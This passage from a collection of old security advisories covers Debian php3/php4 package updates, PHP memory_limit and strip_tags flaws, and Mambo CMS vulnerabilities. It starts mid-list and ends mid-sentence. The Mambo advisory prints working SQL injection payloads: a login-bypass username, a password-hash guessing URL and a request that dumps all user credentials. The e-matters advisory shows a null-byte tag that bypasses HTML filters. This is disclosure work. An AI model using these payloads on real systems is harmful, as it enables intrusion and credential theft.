http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 11008 ae77b5a26d971de670955ec44e75478e\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 51104 9136e3ceba753266d19ce3c17dd4bd36\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 21590 42f2254e07370b514d8124153bbbd683\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 22220 f50119bf451470d06236e4cd99054758\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 9638 9e974172f4c4b53090fbe6d63dc7ed03\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 7296 2995ff06de90ecd02b6dd2656ceee1d6\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 3878 153220cd95ffe11e0c1da781673f1915\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 12542 828c4405cdbc27cb9ee3d5a009718a0a\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 5354 7b036ccf01bf64c57c25b924fbf821b5\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_mipsel.deb\n Size/MD5 checksum: 10842 b0f1c42629762a13143b8112c89317ad\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 376796 32e107a47b36e0362d3b4bc1bd9b433b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 496314 60818d9380ac0e4152240ccefa49a770\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 21602 
f31f7718eec9d398ab0816a6fe2695f5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 25384 14f08528a71af3c04ff7decb3a370889\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 9300 4898695752eb405b3c20aa8abfce6981\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 7580 988def0f028f74b8a041521e5efa930c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 3876 b5535da0c7c87f4795bdb4a740fc24bb\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 13396 d10482012b23c824b2ba85a3b871efd5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 5350 852177e64782688e6b5b122d70da9ef4\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 11040 be11c6325382ea911dab7dc713244677\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 51082 629d97075642da961550df6f190bf371\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 23068 673faa104a3294b9394d2fb7eed77306\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 25842 de97aa08eb88ce57adf1aaf3b80d6a0f\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 9494 8588c20fc3368cef0c502a7de728b862\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 7516 863f45596b7257d518a9edbfa21e5d95\n 
http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 3792 231d028d27d2329594f9fec98b94d484\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 13330 78be778ec106a9168d982fe20808d0a7\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 5260 edb3f6c07bb863f09d4de13a757ae830\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_powerpc.deb\n Size/MD5 checksum: 10820 61a75b5686076a7d9f498dd7bde8f675\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 372384 c9a9a47e963a4654dde350847f6b86c5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 473980 fe4f805056f4a83fbbb1bbb81f9e926b\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 21980 e9acbc9d0aa9409f68b20aa824c96d01\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 24894 8962cff4aed1ef3fce89fb44623f18bb\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 10294 b93ddd1aa8d3edca85d7479575712b37\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 7320 139f2565015ef8799f7c7bef1f994918\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 4072 6f0cacf883393f337995112d786ea6ff\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 13538 d2bd76b462a9f73d15df92913ea2d9c2\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 5742 
b259cd01e8f6933aa6659c54e0cc482d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 11566 eb69ad3c18c5455b189e94f67a5edd2c\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 51082 5c6225ff3b84a3d3b0e30eeb476fa68b\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 21584 f26c5bbfee8a6aeac9c82d6ebc69ea34\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 24610 7e33ce9f0e1041983f7603b11d18adf8\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 9928 d5b69114619977fb0446b23c02c38696\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 7116 1f4e74efc9c7b6d26aa96bedf2a316eb\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 3964 83fe0af6b15f54c3538b95ad7268a142\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 13608 8334ebcf496147fec66d34d47817ea0a\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 5790 c3a938f224c8ff6086b165d81d8da185\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_s390.deb\n Size/MD5 checksum: 11118 fc354357ced4c8c92988e4c8b2e9fc2c\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php3/php3_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 374996 0e7a1ea7a18d6a468fe5bd53ac671076\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 489428 b17ace764d4d2b2bdbf88f9dd3be78db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-gd_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 21002 
2d888a700a4df277c70b448e9ac292a7\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-imap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 24902 ebf943cd3803f6a8df4ffe7f75a94f9c\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-ldap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 9240 600c33ca486f68cb9703750de038ed8d\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-magick_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 7462 219a976e5d95e2c9080777b4ec43f9b5\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mhash_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 3834 4d031d66839d7c1a7cd48d921efab4db\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-mysql_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 12968 44229516d90dc1f3d458f78735ccdf28\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-snmp_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 5460 8cd025e10d5b3a0a236a492b525f2f45\n http://security.debian.org/pool/updates/main/p/php3/php3-cgi-xml_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 10838 d6ede42e9897c2652c46dcd962c99d06\n http://security.debian.org/pool/updates/main/p/php3/php3-dev_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 51086 e13efd1e03547ded62932da4b0b8ebc6\n http://security.debian.org/pool/updates/main/p/php3/php3-gd_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 20894 bad68da4e5c7d0df10af106a0bdf10a3\n http://security.debian.org/pool/updates/main/p/php3/php3-imap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 24746 fcd23934066df9812b8a5f0b6dae597c\n http://security.debian.org/pool/updates/main/p/php3/php3-ldap_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 8856 92892b8379d6398883eafc01d697e805\n http://security.debian.org/pool/updates/main/p/php3/php3-magick_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 7176 37acae7f2c13d854e6962c74ada4e4ca\n http://security.debian.org/pool/updates/main/p/php3/php3-mhash_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 3724 
ad00db227131b3c1093d3e882cd148d2\n http://security.debian.org/pool/updates/main/p/php3/php3-mysql_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 12608 c4d5278e1b52bd9d340e5063be96193e\n http://security.debian.org/pool/updates/main/p/php3/php3-snmp_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 5862 bee1da1ffff4ddd8c66124e150bbbe09\n http://security.debian.org/pool/updates/main/p/php3/php3-xml_3.0.18-23.1woody2_sparc.deb\n Size/MD5 checksum: 10324 207ef48ae3e2af44bb1162aacffa9b87\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2005-02-07T00:00:00", "published": "2005-02-07T00:00:00", "id": "DEBIAN:DSA-669-1:AFB85", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00046.html", "title": "[SECURITY] [DSA 669-1] New php3 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:13", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 531-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nJuly 20th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE Ids : CAN-2004-0594 CAN-2004-0595\n\nTwo vulnerabilities were discovered in php4:\n\n - CAN-2004-0594 - The memory_limit functionality in PHP 4.x up to\n 4.3.7, and 5.x up to 5.0.0RC3, under 
certain conditions such as\n when register_globals is enabled, allows remote attackers to\n execute arbitrary code by triggering a memory_limit abort during\n execution of the zend_hash_init function and overwriting a\n HashTable destructor pointer before the initialization of key data\n structures is complete.\n\n - CAN-2004-0595 - The strip_tags function in PHP 4.x up to 4.3.7, and\n 5.x up to 5.0.0RC3, does not filter null (\\0) characters within tag\n names when restricting input to allowed tags, which allows\n dangerous tags to be processed by web browsers such as Internet\n Explorer and Safari, which ignore null characters and facilitate\n the exploitation of cross-site scripting (XSS) vulnerabilities.\n\nFor the current stable distribution (woody), these problems have been\nfixed in version 4.1.2-7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4:4.3.8-1.\n\nWe recommend that you update your php4 package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- 
---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2004-07-20T00:00:00", "published": "2004-07-20T00:00:00", "id": "DEBIAN:DSA-531-1:B45B2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00133.html", "title": "[SECURITY] [DSA 531-1] New php4 packages fix multiple vulnerabilities", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:22:50", "bulletinFamily": "unix", "description": "PHP is a well known, widely-used scripting language often used within web server setups. Stefan Esser found a problem with the \"memory_limit\" handling of PHP which allows remote attackers to execute arbitrary code as the user running the PHP interpreter. This problem has been fixed. Additionally a problem within the \"strip_tags\" function has been found and fixed which allowed remote attackers to inject arbitrary tags into certain web browsers, issuing XSS related attacks. 
Since there is no easy workaround except disabling PHP, we recommend an update for users running the PHP interpreter within the apache web server.", "modified": "2004-07-16T12:43:18", "published": "2004-07-16T12:43:18", "id": "SUSE-SA:2004:021", "href": "http://lists.opensuse.org/opensuse-security-announce/2004-07/msg00004.html", "title": "remote code execution in php4/mod_php4", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: PHP strip_tags() bypass vulnerability\r\n Release Date: 2004/07/14\r\nLast Modified: 2004/07/14\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: PHP <= 4.3.7\r\n PHP5 <= 5.0.0RC3\r\n Severity: A binary safety problem within PHP's strip_tags() \r\n function may allow injection of arbitrary tags \r\n in Internet Explorer and Safari browsers\r\n Risk: Moderate\r\nVendor Status: Vendor has released a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/122004.html\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n According to Security Space PHP is the most popular Apache module\r\n and is installed on about 50% of all Apaches worldwide. This figure\r\n includes of course only those servers that are not configured with\r\n expose_php=Off.\r\n \r\n During an audit of the PHP source code a binary safety problem in\r\n the handling of allowed tags within PHP's strip_tags() function\r\n was discovered. This problem may allow injection of f.e. 
Javascript\r\n in Internet Explorer and Safari browsers.\r\n \r\n\r\nDetails:\r\n \r\n Many sites stop XSS attacks by stripping unsafe HTML tags from the\r\n user's input. PHP scripts usually implement this functionality\r\n with the strip_tags() function. This function takes an optional\r\n second parameter to specify tags that should not get stripped\r\n from the input.\r\n \r\n $example = strip_tags($_REQUEST['user_input'], "<b><i><s>");\r\n \r\n Due to a binary safety problem within the allowed tags handling\r\n attacker supplied tags like: <\0script> or <s\0cript> will pass \r\n the check and won't get stripped. (magic_quotes_gpc must be Off)\r\n \r\n In a perfect world this would be no dangerous problem because\r\n such tags are either in the allowed taglist or should get \r\n ignored by the browser because they have no meaning in HTML.\r\n \r\n In the real world however MS Internet Explorer and Safari filter\r\n '\0' characters from the tag and accept them as valid. Quite\r\n obvious that this can not only lead to a number of XSS issues \r\n on sites that filter dangerous tags with PHP's strip_tags() but\r\n also on every other site that filters them with pattern matching\r\n and is not necessarily running PHP.\r\n\r\n According to tests:\r\n\r\n - Opera\r\n - Konqueror\r\n - Mozilla\r\n - Mozilla Firefox\r\n - Epiphany\r\n \r\n are NOT affected by this.\r\n \r\n\r\nProof of Concept:\r\n\r\n e-matters is not going to release an exploit for this vulnerability\r\n to the public.\r\n \r\n\r\nDisclosure Timeline:\r\n\r\n 26. June 2004 - Problem found and fixed in CVS\r\n 14. 
July 2004 - Public Disclosure\r\n\r\n \r\nCVE Information:\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has\r\n assigned the name CAN-2004-0595 to this issue.\r\n\r\n\r\nRecommendation:\r\n\r\n Because Internet Explorer is out of all reason still the most used\r\n browser fixing this problem within your PHP version is strongly\r\n recommended.\r\n \r\n \r\nGPG-Key:\r\n\r\n http://security.e-matters.de/gpg_key.asc\r\n \r\n pub 1024D/3004C4BC 2004-05-17 e-matters GmbH - Securityteam \r\n Key fingerprint = 3FFB 7C86 7BE8 6981 D1DA A71A 6F7D 572D 3004 C4BC\r\n\r\n\r\nCopyright 2004 Stefan Esser. All rights reserved.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\niD8DBQFA9Ic7b31XLTAExLwRAq6eAJ4j5AomlAJUhEHoDmLwCk4RqvJlVgCgqIN7\r\nD9N75IutqIcoce4xqJTw6XQ=\r\n=Q5NT\r\n-----END PGP SIGNATURE-----\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "modified": "2004-07-14T00:00:00", "published": "2004-07-14T00:00:00", "id": "SECURITYVULNS:DOC:6483", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6483", "title": "[Full-Disclosure] Advisory 12/2004: PHP strip_tags() bypass vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "##########################################################\r\n# GulfTech Security Research February 24, 2006\r\n##########################################################\r\n# Vendor : Miro International Pty Ltd\r\n# URL : http://www.mamboserver.com/\r\n# Version : Mambo <= 4.5.3h\r\n# Risk : Multiple Vulnerabilities\r\n##########################################################\r\n\r\n\r\n\r\nDescription:\r\nMambo is a popular Open Source Content Management 
System\r\nreleased under the GNU General Public license (GNU GPL).\r\nThere are a number of security issues in Mambo which allows\r\nfor SQL Injection, Authentication Bypass, and possible remote\r\ncode execution via local file inclusion. There has been an\r\nupdated version of Mambo released and all users are advised\r\nto upgrade as soon as possible. Also, please note that these\r\nvulnerabilities are NOT related to any worms currently taking\r\nadvantage of vulnerable Mambo installations.\r\n\r\n\r\n\r\nSQL Injection:\r\nThere are several SQL Injection issues in Mambo Open Source.\r\nThe easiest to exploit of the issues allows an attacker to\r\nlogin as any user. The only info the attacker has to have is\r\nthe target username (if no user is specified, the first user\r\nfrom the users table will be selected instead).\r\n\r\n\r\nfunction login( $username=null,$passwd=null ) {\r\nglobal $acl;\r\n\r\n$usercookie = mosGetParam( $_COOKIE, 'usercookie', '' );\r\n$sessioncookie = mosGetParam( $_COOKIE, 'sessioncookie', '' );\r\nif (!$username || !$passwd) {\r\n $username = trim( mosGetParam( $_POST, 'username', '' ) );\r\n $passwd = trim( mosGetParam( $_POST, 'passwd', '' ) );\r\n $passwd = md5( $passwd );\r\n $bypost = 1;\r\n}\r\n$remember = trim( mosGetParam( $_POST, 'remember', '' ) );\r\n\r\nif (!$username || !$passwd) {\r\n echo "<script> alert(\""._LOGIN_INCOMPLETE."\"); window.\r\n history.go(-1); </script>\n";\r\n exit();\r\n} else {\r\n $this->_db->setQuery( "SELECT id, gid, block, usertype"\r\n . "\nFROM #__users"\r\n . 
"\nWHERE username='$username' AND password='$passwd'"\r\n );\r\n $row = null;\r\n if ($this->_db->loadObject( $row )) {\r\n if ($row->block == 1) {\r\n echo "<script>alert(\""._LOGIN_BLOCKED."\"); window.\r\n history.go(-1); </script>\n";\r\n exit();\r\n }\r\n // fudge the group stuff\r\n $grp = $acl->getAroGroup( $row->id );\r\n $row->gid = 1;\r\n\r\n if ($acl->is_group_child_of( $grp->name, 'Registered', 'ARO' ) ||\r\n $acl->is_group_child_of( $grp->name, 'Public Backend', 'ARO' )) {\r\n // fudge Authors, Editors, Publishers and Super Administrators\r\n into the Special Group\r\n $row->gid = 2;\r\n }\r\n \r\n\r\nThe above code is from mosMainFrame class (/includes/mambo.php)\r\nand is the source of the previously mentioned problem. The\r\nfunction mosGetParam() for the most part just imports GPC\r\nvariables, and has no real effective filtering or the like, so\r\nseveral variables shown above contain unsanitized data. These\r\nvariables include $username, which is shortly thereafter passed\r\nto the query, thus allowing a user to bypass a login by supplying\r\na username of "user'/*" and any password. This is a very serious\r\nissue, but should prove easy to fix by either adding better\r\nfiltering in the mosGetParam() or sanitizing the data within the\r\nlogin() function, or both. 
If a malicious user is able to use this\r\nvulnerability to gain admin privileges then it is pretty much\r\ngame over as an attacker could then upload, and install a malicious\r\nmodule and execute any php code of their choice on the server.\r\n\r\nAnother issue with Mambo Open Source is data passed to the\r\nmosMenuCheck() function is usually unsanitized in regards to the\r\n$task parameter.\r\n\r\nfunction mosMenuCheck( $Itemid, $menu_option, $task, $gid ) {\r\nglobal $database;\r\n$dblink="index.php?option=$menu_option";\r\nif ($Itemid!="" && $Itemid!=0) {\r\n $database->setQuery( "SELECT access FROM #__menu WHERE id='$Itemid'" );\r\n} else {\r\n if ($task!="") {\r\n $dblink.="&task=$task";\r\n }\r\n $database->setQuery( "SELECT access FROM #__menu WHERE link like \r\n'$dblink%'" );\r\n}\r\n$results = $database->loadObjectList();\r\n$access = 0;\r\n//echo "<pre>"; print_r($results); echo "</pre>";\r\nforeach ($results as $result) {\r\n $access = max( $access, $result->access );\r\n}\r\nreturn ($access <= $gid);\r\n}\r\n\r\nAs seen in the above code the unsanitized $task variable will be\r\nused in the query as long as $Itemid is empty.\r\n\r\nhttp://mambo/index2.php?option=com_content&task=-99'%20UNION%20SELECT%201%20FROM%20\r\nmos_users%20WHERE%20username='admin'%20AND%20MID(password,1,1)='2'/*&id=24&Itemid=0\r\n\r\nIf the first character from the password hash belonging to the\r\nuser "admin" is two as specified above then Mambo displays the\r\nerror "You need to login". This is an easy issue to exploit,\r\nand unfortunately mosMenuCheck() is called in the same unsafe\r\nmanner from other files as well. 
Last but not least there is an\r\nSQL Injection issue in the "com_content" component, particularly\r\nthe showCategory() function.\r\n\r\n// get the total number of published items in the category\r\n// filter functionality\r\n$filter = trim( mosGetParam( $_POST, 'filter', '' ) );\r\n$filter = strtolower( $filter );\r\n$and = '';\r\nif ( $filter ) {\r\n if ( $params->get( 'filter' ) ) {\r\n switch ( $params->get( 'filter_type' ) ) {\r\n case 'title':\r\n $and = "\n AND LOWER( a.title ) LIKE '%". $filter ."%'";\r\n break;\r\n case 'author':\r\n $and = "\n AND ( ( LOWER( u.name ) LIKE '%". $filter ."%' ) OR\r\n ( LOWER( a.created_by_alias ) LIKE '%". $filter ."%' ) )";\r\n break;\r\n case 'hits':\r\n $and = "\n AND a.hits LIKE '%". $filter ."%'";\r\n break;\r\n }\r\n }\r\n\r\n}\r\n\r\nAs you can see from the above code, the $filter variable is passed\r\nto the query completely unsanitized, and allows for easy to exploit\r\nSQL Injection. This is very dangerous.\r\n\r\nfilter=' UNION SELECT \r\n1,2,3,4,CONCAT(username,CHAR(58),password),6,7,8,9,1 FROM mos_users\r\nWHERE \r\n1/*&order=rdate&limit=10&id=0&sectionid=&task=category&option=com_content\r\n\r\nThe above data sent in a post request to the vulnerable script will\r\neffectively dump every single username and password hash in the\r\ndatabase to the attacker. It should be noted that the above attacks are\r\nonly effective in the default php enviornment of magic_quotes_gpc off\r\n\r\n\r\n\r\nArbitrary File Inclusion:\r\nIt is possible to include arbitrary local files, and ultimately execute\r\ncode within the vulnerable Mambo Open Source installation. 
The problem\r\nlies in the _setTemplate() function not properly sanitizing GPC data.\r\n\r\n// TemplateChooser Start\r\n$mos_user_template = mosGetParam( $_COOKIE, 'mos_user_template', '' );\r\n$mos_change_template = mosGetParam( $_REQUEST, 'mos_change_template', \r\n$mos_user_template );\r\nif ($mos_change_template) {\r\n // check that template exists in case it was deleted\r\n if (file_exists( \r\n"$mosConfig_absolute_path/templates/$mos_change_template/index.php" )) {\r\n $lifetime = 60*10;\r\n $cur_template = $mos_change_template;\r\n setcookie( "mos_user_template", "$mos_change_template", time()+$lifetime);\r\n } else {\r\n setcookie( "mos_user_template", "", time()-3600 );\r\n }\r\n}\r\n\r\nAs seen in the above code, there are several unsanitized variables\r\nintroduced into the function, and $mos_change_template in particular\r\nis ultimately set as the current template and used through out the\r\napplication. There are never any effective traversal checks, so we\r\ncan include arbitrary locations on the local machine, and in some\r\ncases execute arbitrary code as long as the file is named index.php\r\n(i.e. /tmp/index.php) The reason for the restrictions are because\r\nof the strip_tags call in mosGetParam, but some older versions of php\r\ndo not use a binary safe strip_tags (CAN-2004-0595) which allows for\r\nnull characters. So, in those cases the file inclusion is much more\r\ndangerous and easy to exploit.\r\n\r\n\r\n\r\nSolution:\r\nThere has been a new version of the Mambo software released to fix\r\nthe previously mentioned vulnerabilities.\r\n\r\nhttp://mamboxchange.com/frs/?group_id=5\r\n\r\nThe above link contains all of the relative patches as well as the\r\nsecured full releases. 
Users are encouraged to upgrade their Mambo\r\ninstallations as soon as possible.\r\n\r\n\r\n\r\nCredits:\r\nJames Bercegay of the GulfTech Security Research Team\r\n\r\n\r\n\r\nRelated Info:\r\nThe original advisory can be found at the following location\r\nhttp://www.gulftech.org/?node=research&article_id=00104-02242006\r\n\r\n", "modified": "2006-02-25T00:00:00", "published": "2006-02-25T00:00:00", "id": "SECURITYVULNS:DOC:11592", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11592", "title": "Mambo Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n e-matters GmbH\r\n www.e-matters.de\r\n\r\n -= Security Advisory =-\r\n\r\n\r\n\r\n Advisory: PHP memory_limit remote vulnerability\r\n Release Date: 2004/07/14\r\nLast Modified: 2004/07/14\r\n Author: Stefan Esser [s.esser@e-matters.de]\r\n\r\n Application: PHP <= 4.3.7\r\n PHP5 <= 5.0.0RC3\r\n Severity: A vulnerability within PHP allows remote code\r\n execution on PHP servers with activated memory_limit\r\n Risk: Critical\r\nVendor Status: Vendor has released a bugfixed version.\r\n Reference: http://security.e-matters.de/advisories/112004.html\r\n\r\n\r\nOverview:\r\n\r\n PHP is a widely-used general-purpose scripting language that is \r\n especially suited for Web development and can be embedded into HTML.\r\n\r\n According to Security Space PHP is the most popular Apache module\r\n and is installed on about 50% of all Apaches worldwide. This figure\r\n includes of course only those servers that are not configured with\r\n expose_php=Off.\r\n \r\n During a reaudit of the memory_limit problematic it was discovered \r\n that it is possible for a remote attacker to trigger the memory_limit\r\n request termination in places where an interruption is unsafe. 
